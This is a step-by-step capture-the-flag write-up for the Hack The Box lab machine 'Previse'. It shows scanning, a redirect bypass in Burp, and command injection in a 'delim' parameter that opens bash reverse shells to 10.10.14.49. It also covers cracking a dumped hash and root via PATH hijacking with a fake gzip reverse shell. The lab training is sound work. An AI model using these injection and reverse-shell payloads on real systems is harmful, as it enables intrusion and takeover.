Previse

let's start with Nmap

nmap -sV 10.129.95.185

Let's go to the url

gobuster dir -u 10.129.95.185 -w /usr/share/dirb/wordlists/common.txt -x .php

Go to ip/nav.php

Open burp

Go to proxy

Turn on intercept

Return to the website and click on "Create account" on the website

Go back to proxy

Click on Action --> Do intercept --> response to this request

Then click on forward

Change "302 Found" by "200 OK"

Click on forward

This time we get access to the page to create a new account!

Turn off Intercept in Burp

So let's create an account

username : hello123

password : hello123

click on create user

we are directed to the login page

let's try to login with our new account

we are in!

go to Files

there is a file there

Click on the file to download it.

Check out all the files in it.

Check config.php

We got credentials to access a mysql database!

username: root

password: mySQL_p@ssw0rd!:)

Go back to website

under management menu --> log data

Click submit

we get a file with logs:

Let's use Burp to intercept the request when we click submit to request log data

Go back to Management Menu --> Log Data

Open Burp and under Proxy tab, turn on Intercept

Go back to the website and click on Submit

Go back to Burp to see what was intercepted:

now we are going to add a script after delim=comma like in the screenshot below:

Basically we are replacing:

delim=comma

by:

delim=comma%26curl+http%3a//10.10.14.49%3a4444

URL-encoding to ASCII values:

%3a -----> :

%26 -----> &

Encoded:

delim=comma%26curl+http%3a//10.10.14.49%3a4444

Decoded:

delim=comma&curl+http://10.10.14.49:4444

we are basically running the curl command on port 4444 of our virtual machine. We are now going to listen from our VM on port 4444 and try to get a shell!

curl http://10.10.14.49:4444

Now before we do anything else, open a new command prompt from your VM, type the following netcat command and press enter

nc -lnvp 4444

Now that we have our netcat listening, we intercepted the request and changed the delim=comma,

Let's click on Forward in Burp

Click on Forward in Burp

It worked!

Stop the netcat listener on port 4444 for now. Type Ctrl C to stop.

Now let's do this all over again but this time we replay the request calling the binary /bin/bash to get a reverse shell on port 6666

1. create a new netcat by using nc -lnvp 6666

2. change the script from

delim=comma 

to

delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.49/6666+0>%261'

If we decode this, it means:

delim=comma&/bin/bash -c 'bash -i > /dev/tcp/10.10.14.49/6666 0>&1'

On Burp click on Forward

we got the shell again!

type id

As usual, let's spawn it by typing:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now earlier we found credentials of the database in the file.

from there let;s try to connect to the mysql database by using

mysql -u root -p

when you are prompted password, type the password found in the file at the beginning

mySQL_p@ssw0rd!:)

we are in!

show databases;

use previse;

show tables;

SELECT * from accounts;

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Save the password into a file called hashed.txt

We can use the hashcat command to get the password.

hashcat -m 500  hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

This might take a few minutes. It tells us below estimated time is 14 minutes. Just wait.

Press s if you want to know the status:

Finished! We got the password below:

ilovecody112235!

Done! we got the password for m4lwhere

We know from the nmap we ran at the very beginning that port 22 is open which is SSH. Let's now try to ssh to the target machine using the username m4lwhere we found earlier.

ssh m4lwhere@10.129.95.185

When prompted for the password, type the password we just found:

ilovecody112235!

It worked and we are in!

ls

cat user.txt

You got the user flag! Congratulations!

As usual, let's do

sudo -l

When prompted for the password for m4lwhere, type:

ilovecody112235!

We find that the user m4lwhere can run the following commands on Previse:

(root) /opt/scripts/access_backup.sh

Let's first check out what this file is by using:

cat /opt/scripts/access_backup.sh

which gzip

cd /tmp 

echo "bash -i >& /dev/tcp/10.10.14.49/9080 0>&1" > gzip  

this creates a file called gzip in the directory tmp

The file just contains :

bash -i >& /dev/tcp/10.10.14.49/9080 0>&1

 chmod +x gzip

this give executable permission to our new file gzip

 export PATH=/tmp:$PATH 

this adds /tmp to the path.

Open a new prompt on your VM and type:

nc -lnvp 9080

Now go back to the m4lwhere@previse shell and type:

sudo /opt/scripts/access_backup.sh

When you return to your netcat, you notice you got the shell and we are root!

cd ..

cd root

ls

cat root.txt

Congratulations! you got the root flag!